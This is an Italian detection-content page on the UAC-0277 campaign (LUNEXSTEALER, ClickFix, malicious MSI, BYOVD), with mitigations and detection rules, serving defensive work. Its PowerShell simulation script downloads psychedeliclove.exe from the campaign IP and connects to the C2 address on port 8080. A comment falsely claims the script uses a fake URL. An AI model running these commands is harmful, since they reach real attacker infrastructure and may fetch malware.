Attacchi UAC-0277 Distribuiscono LUNEXSTEALER tramite MSI Malevoli e ClickFix
Detection stack
- AIDR
- Alert
- ETL
- Query
Sommario
Gli attori della minaccia tracciati come UAC-0277 stanno compromettendo siti web legittimi per iniettare JavaScript dannoso che attira gli utenti ad eseguire comandi tramite una falsa pagina di verifica Cloudflare. Questa tecnica ClickFix consegna infine pacchetti MSI contenenti LUNEXSTEALER o ulteriori loader che sfruttano BYOVD per eludere i controlli di sicurezza. La campagna utilizza anche un’infrastruttura di comando e controllo basata su blockchain su Polygon ed Ethereum per gestire dinamicamente le risorse degli aggressori.
Indagine
CERT-UA ha identificato più di 100 siti web compromessi e analizzato tre varianti MSI associate alla campagna. I ricercatori hanno osservato il side-loading DLL coinvolgendo FnHotkeyUtility.exe e lo sfruttamento del driver vulnerabile AMD PDFWKRNL.sys per bypassare le protezioni di Windows Defender. L’indagine ha anche rivelato l’estensione del browser LUNARAXE e il componente PowerShell NAIVEMESS utilizzati per raccogliere ed esfiltrare dati.
Mitigazione
Gli amministratori dovrebbero limitare l’accesso al dialogo Esegui (Win+R) tramite i criteri di gruppo e limitare i privilegi di installazione MSI agli utenti autorizzati. È essenziale abilitare la lista di blocco dei driver vulnerabili di Microsoft per ridurre il rischio di attacchi BYOVD. Le organizzazioni dovrebbero anche imporre delle allowlist per le estensioni del browser e monitorare l’attività della riga di comando di msiexec.exe sospetta che coinvolge URL remoti.
Risposta
Quando viene rilevata un’esecuzione MSI sospetta o estensioni del browser non autorizzate, isolare l’host interessato e terminare i processi associati a LUNEXSTEALER. Controllare le attività pianificate per voci nominate psychedelicloveUtils e ispezionare i profili del browser per l’estensione Microsoft Office Word Editor. Qualsiasi pagina di verifica Cloudflare falsa associata alla campagna dovrebbe essere segnalata a CERT-UA.
Flusso di Attacco
Rilevazioni
Voce RunMRU sospetta con semantica LOLBin (via registry_event)
Possibile tentativo di installazione di file MSI remoto (via cmdline)
Attività pianificata sospetta (via audit)
Download di file sospetto IP diretto (via proxy)
Comando e controllo sospetto tramite richiesta DNS di dominio di primo livello insolito (TLD) (via dns)
IOC (HashSha256) per rilevare: Campagna UAC-0277: Distribuzione MSI dannosa tramite tecnica ClickFix e malware LUNEXSTEALER Parte 2
IOC (HashSha256) per rilevare: Campagna UAC-0277: Distribuzione MSI dannosa tramite tecnica ClickFix e malware LUNEXSTEALER Parte 1
IOC (HashMd5) per rilevare: Campagna UAC-0277: Distribuzione MSI dannosa tramite tecnica ClickFix e malware LUNEXSTEALER Parte 2
IOC (HashMd5) per rilevare: Campagna UAC-0277: Distribuzione MSI dannosa tramite tecnica ClickFix e malware LUNEXSTEALER Parte 1
IOC (SourceIP) per rilevare: Campagna UAC-0277: Distribuzione MSI dannosa tramite tecnica ClickFix e malware LUNEXSTEALER
IOC (DestinationIP) per rilevare: Campagna UAC-0277: Distribuzione MSI dannosa tramite tecnica ClickFix e malware LUNEXSTEALER
Rileva interazione con server C2 dannosi utilizzando HTTP e WebSocket [Connessione di rete Windows]
FnHotkeyUtility esegue spkvol.dll dannoso tramite side-loading DLL [Windows Sysmon]
Download di pacchetto MSI dannoso utilizzando Msiexec e sfruttamento di vulnerabilità [Creazione di processo Windows]
Rileva JavaScript dannoso su siti web compromessi [Webserver]
Esecuzione della simulazione
-
Narrazione dell’attacco e comandi: L’avversario ha eseguito con successo un compromesso drive-by. Per stabilire la persistenza e scaricare il malware di fase successiva, l’agente impiantato tenta di recuperare un file denominato
psychedeliclove.exeda un URI specifico. Contemporaneamente, l’agente tenta di inviare segnali a un nodo C2 secondario situato a193.178.159.128sulla porta8080per ricevere istruzioni tramite una connessione HTTP simile a WebSocket. Questi indicatori specifici sono destinati a innescare le regole di rilevamento esistenti basate su proxy. -
Script di test di regressione:
# Script di simulazione per convalida della rilevazione # Scopo: Attivare gli indicatori URL e IP/Porto specifici nella regola di rilevamento. Write-Host "[*] Inizio simulazione..." -ForegroundColor Cyan # 1. Selezione attivazione 1: Modello URL dannoso Write-Host "[*] Tentativo di accesso al modello URL dannoso..." -ForegroundColor Yellow try { # Utilizziamo un listener locale inesistente o un URL falso per garantire di non colpire effettivamente un vero sito dannoso, # ma il proxy dovrebbe comunque registrare il tentativo di richiesta. Invoke-WebRequest -Uri "http://107.175.82.242:9000/wilow/psychedeliclove.exe" -ErrorAction SilentlyContinue } catch { Write-Host "[!] Richiesta fallita (prevista), ma la telemetria dovrebbe essere generata." -ForegroundColor Gray } # 2. Selezione attivazione 2: IP e porta specifici Write-Host "[*] Tentativo di connessione all'IP C2 sulla porta 8080..." -ForegroundColor Yellow try { $client = New-Object System.Net.Sockets.TcpClient $client.Connect("193.178.159.128", 8080) $client.Close() } catch { Write-Host "[!] Connessione fallita (prevista), ma i log del proxy dovrebbero catturare il tentativo." -ForegroundColor Gray } Write-Host "[*] Simulazione completata." -ForegroundColor Cyan -
Comandi di pulizia:
# Nessun file persistente viene creato da questa simulazione. # Vengono tentate solo connessioni di rete temporanee. Write-Host "[*] Pulizia completata. Nessun artefatto lasciato nel sistema." -ForegroundColor Green